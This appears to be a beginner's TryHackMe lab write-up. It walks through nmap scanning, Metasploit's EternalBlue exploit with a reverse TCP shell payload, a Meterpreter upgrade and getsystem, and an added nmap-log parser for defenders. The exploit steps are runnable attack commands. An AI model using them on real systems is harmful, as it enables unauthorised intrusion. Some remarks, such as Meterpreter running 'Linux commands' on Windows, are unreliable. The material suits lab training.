TryHackMe CTF Writeup

Hello Guys!

This is my first write-up, so ignore any silly mistakes lol. 😌

Source: TryHackMe

Room: Lazyblue with IP

Difficulty: Easy

This room is made for beginner-level hackers; however, anyone can try to hack into this box.

Anyways, let's jump into action!



Reconnaissance:

The first step in almost every box is running an nmap scan.
Command: nmap -sC -sV -A (ip) -oN lazy.log

nmap: a tool to scan an IP's ports
-A is used for an aggressive scan (OS detection, version detection, script scanning and traceroute)
-oN is used here to save the output in lazy.log (you can view it after enumeration with the command: cat lazy.log)
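
For the defensive side of the same scan, here is an added example (not part of the original write-up): a small Python parser for the lazy.log file written by -oN that lists the open ports a defender would review first. The sample log, the 192.0.2.10 address and the REVIEW list are constructed for illustration.

```python
import re

# Constructed sample of nmap normal (-oN) output; 192.0.2.10 is a documentation address.
SAMPLE_LOG = """\
Nmap scan report for 192.0.2.10
PORT     STATE    SERVICE       VERSION
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp filtered ms-wbt-server
Host script results:
| smb-os-discovery:
|_  OS: Windows 7 Professional 7601 Service Pack 1
"""

HOST_LINE = re.compile(r"^Nmap scan report for (.+)$")
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Assumed review list for a Windows host (illustrative, not from the write-up).
REVIEW = {
    139: "NetBIOS session service exposed: block at the network edge",
    445: "SMB exposed: confirm MS17-010 is patched and SMBv1 is disabled",
    3389: "RDP exposed: restrict to VPN or a jump host",
}

def parse_nmap_normal(text):
    """Return {host: [(port, proto, state, service, version), ...]} from -oN output."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            current = m.group(1).strip()
            hosts[current] = []
            continue
        m = PORT_LINE.match(line)
        if m and current is not None:  # skips the table header and "|" script output
            port, proto, state, service, version = m.groups()
            hosts[current].append((int(port), proto, state, service, version.strip()))
    return hosts

def findings(hosts):
    """Return (host, port, note) for each open TCP port that is on the review list."""
    return [(host, port, REVIEW[port])
            for host, ports in hosts.items()
            for port, proto, state, _svc, _ver in ports
            if proto == "tcp" and state == "open" and port in REVIEW]

if __name__ == "__main__":
    for host, port, note in findings(parse_nmap_normal(SAMPLE_LOG)):
        print(f"{host}:{port}/tcp  {note}")
```

To run it against a real scan, pass the contents of lazy.log to parse_nmap_normal instead of SAMPLE_LOG.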

Gain Access:

Now, open Metasploit (command: msfconsole -q)
then, search eternalblue
then, use 2
or, use exploit/windows/smb/ms17_010_eternalblue
then, set RHOSTS (host ip)
then, set PAYLOAD windows/x64/shell/reverse_tcp
then, show options - to check whether all the requirements are satisfied
then, set LHOST tun0 (the OpenVPN interface for TryHackMe)

then, command: exploit, run, or run -j


Now you can see that our exploit has executed and we got a shell on the Windows host. But in order to continue, we need a Meterpreter shell to run Linux commands and upload files.

Escalate:

Background the host session with the command: background, or press ctrl+z (on Linux) or command+z (on Mac), and use shell_to_meterpreter.

then, search meterpreter
then, use 202, or use post/multi/manage/shell_to_meterpreter

then, show options and, if any requirement is not satisfied, provide it

set SESSION 1 (you can check the running session with command: sessions)

then, exploit
(If it ran and the intercept was successful, OK; otherwise change LPORT to 1234)

then, check that the new session has started with the command: sessions
Now, run sessions 2

Cracking:

Now, check some system info with sysinfo, and check whether you are running as NT AUTHORITY\SYSTEM with: getsystem
If you didn't get it, run shell (to go back to the shell), run systeminfo there to check, then go back to Meterpreter with ctrl+z

Find Flag:

Everything is done. From here, you need to find the flag by yourself.

